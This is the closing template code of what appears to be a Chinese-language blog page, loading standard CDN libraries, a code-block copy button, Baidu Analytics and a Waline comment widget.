  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"复制到粘贴板！\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "复制成功！");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

  <script type="text/javascript">
        var _hmt = _hmt || [];
        (function() {
          var hm = document.createElement("script");
          hm.src = "https://hm.baidu.com/hm.js?9ff526edfca1e553fd58a8876eb755c9";
          var s = document.getElementsByTagName("script")[0];
          s.parentNode.insertBefore(hm, s);
        })();
        </script>

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->



<!-- Waline Comments -->

  <script type="module">
    import { init } from 'https://unpkg.com/@waline/client@v2/dist/waline.mjs';

    var EMOJI = ['//unpkg.com/@waline/emojis@1.2.0/weibo']
    var META = ['nick', 'mail', 'link'];
    var REQUIREDFIELDS = ['nick', 'mail', 'link'];

    var emoji = '//unpkg.com/@waline/emojis@1.2.0/qq'.split(',').filter(function(item){
      return item !== ''; // filter()返回满足不为空item
    });
    emoji = emoji.length == 0 ? EMOJI : emoji;

    var meta = 'nick,mail'.split(',').filter(function(item){
      return META.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    meta = meta.length == 0 ? META : meta;

    var requiredFields = 'nick,mail'.split(',').filter(function(item){
      return REQUIREDFIELDS.indexOf(item) > -1; // filter()返回满足META.indexOf(item) > -1为true的item
    });
    requiredFields = requiredFields.length == 0 ? REQUIREDFIELDS : requiredFields;

    init({
      el: '#waline_thread',
      serverURL: 'https://comment.anch0r.top', // Waline 的服务端地址
      path: '' == '' ? window.location.pathname : '', // 当前文章页路径，用于区分不同的文章页，以保证正确读取该文章页下的评论列表
      lang: 'zh-CN' == '' ? 'zh-CN' : 'zh-CN', // 多语言支持，未设置默认英文
      emoji: emoji,
      dark: 'true', // 暗黑模式适配
      commentSorting: '' == '' ? 'latest' : '', // 评论列表排序方式
      meta: meta, // 评论者相关属性
      requiredFields: requiredFields, // 设置必填项，默认匿名
      login: '', // 登录模式状态
      wordLimit: '', // 评论字数限制
      pageSize: '10' == '' ? 10 : '10', // 评论列表分页，每页条数
      imageUploader: '', // 自定义图片上传方法
      highlighter: '', // 代码高亮
      placeholder: '',
      avatar: 'mm',
      visitor: 'false',
      comment_count: 'true',
    });
  </script>



</body>
</html>
